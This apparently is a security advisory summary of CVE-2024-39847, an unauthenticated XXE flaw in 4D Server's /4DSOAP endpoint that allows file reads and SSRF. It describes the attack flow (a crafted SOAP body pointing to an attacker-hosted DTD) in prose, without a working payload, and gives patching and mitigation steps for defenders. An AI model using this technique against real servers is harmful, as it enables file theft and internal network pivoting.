Unauthenticated XXE in 4D Server SOAP endpoint leaks files and drives SSRF
TL;DR - 4D Server's /4DSOAP endpoint resolves XML external entities with no authentication required. Point it at an attacker-controlled DTD, read files off the server or adjacent network shares, and make the server issue arbitrary HTTP GET requests to internal services.
What happened
4D Server is the database and application server at the core of the 4D development platform. CVE-2024-39847 describes an XXE vulnerability in its SOAP endpoint that any unauthenticated attacker on the network can exploit.
SCHUTZWERK's advisory demonstrates the attack: send a crafted SOAP body to /4DSOAP referencing an attacker-hosted DTD. That DTD instructs the parser to fetch file:// paths for local file reads, and remote URLs to make the server issue outbound HTTP GET requests. Two impact classes from one request - data exfiltration and SSRF-style internal pivoting.
One detail defenders should not miss: the advisory confirms the issue is exploitable even when the GUI option Reject SOAP-Requests is enabled. If you assumed that toggle was a compensating control, it isn't.
| Item | Detail |
|---|---|
| Affected component | 4D Server SOAP endpoint(s) / XML parser |
| Platform scope | Windows |
| Affected versions | <= v20 R3 affected; v20 R4 to v20 R6 status unknown |
| Severity | CVSS v4.0 8.7 (High) |
| Impact | Arbitrary file read (local and adjacent network shares), outbound HTTP GET (SSRF) |
XXE on an internet-reachable SOAP surface crosses trust boundaries fast - filesystem, SMB shares, and internal HTTP services - without needing any credentials.
Who is impacted
- Any internet-exposed 4D Server deployment where
/4DSOAPis reachable. - Environments running 4D Server in the affected version range.
- Highest-risk setups where the 4D Server service account can read sensitive local files, reach adjacent SMB or network shares, or connect to internal HTTP services that should never be externally reachable.
What to do now
- Apply the vendor fix. Update to
4D Server 20 R7or higher."Update to 4D Server 20 R7 or higher."
- Treat this as broader than a web vulnerability. Audit what the 4D Server service account can access:
- filesystem paths holding secrets (config files, backups, key material)
- adjacent network shares reachable from the server host
- internal HTTP services that should not be reachable from this network tier
- If you cannot patch immediately, reduce exposure while you work toward it:
- restrict network access to
/4DSOAPat the edge using allowlists, VPN requirements, or network segmentation - do not rely on the
Reject SOAP-RequestsGUI option as a control - it does not block this attack - monitor for unexpected inbound requests to
/4DSOAPand for anomalous outbound HTTP from the server process, a common indicator of out-of-band XXE exfiltration
- restrict network access to
Related
Research
Content is AI-assisted and reviewed by our team, but issues may be missed and best practices evolve rapidly, send corrections to [email protected]. Always consult official documentation and validate key implementation decisions before making design or security choices.